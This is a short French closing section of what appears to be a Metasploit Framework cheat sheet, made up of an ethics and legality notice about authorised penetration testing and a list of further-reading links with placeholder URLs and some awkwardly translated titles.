*** Avis de sécurité**: Metasploit Framework est un puissant outil de test de pénétration qui ne devrait être utilisé que sur les systèmes que vous possédez ou qui ont l'autorisation écrite explicite de tester. L'utilisation non autorisée de cet outil contre les systèmes que vous ne possédez pas est illégale et contraire à l'éthique. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des tests de sécurité. Cette feuille de triche est destinée à des fins éducatives et aux tests de sécurité autorisés seulement. Il incombe aux utilisateurs de se conformer à toutes les lois et règlements applicables dans leur juridiction.

** Ressources supplémentaires** : - [Documentation officielle sur les métadonnées] (LINK_4) - [Métasploit sans laisser de cours] (LINK_4) - [Communauté Rapid7] (LINK_4) - [Dépôt de mémoire GitHub] (LINK_4)